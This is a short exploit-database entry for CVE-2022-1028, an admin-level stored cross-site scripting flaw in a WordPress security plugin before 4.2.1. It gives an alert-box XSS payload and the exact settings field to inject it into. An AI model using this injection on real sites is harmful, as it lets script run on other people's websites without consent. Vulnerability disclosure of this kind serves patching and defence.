Exploit for WordPress Security < 4.2.1 - Admin+ Stored Cross-Site Scripting CVE-2022-1028

Name: Exploit for WordPress Security < 4.2.1 - Admin+ Stored Cross-Site Scripting CVE-2022-1028
Rating: 5 (86 reviews)

2022-06-06 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:16FC08EC-8476-4F3C-93EA-6A51ED880DD5
Put the following payload in the "Advanced Blocking" tab > "Block HTTP Referer's" section > "Add Referer" field: "><img src=x onerror=alert(/XSS/)>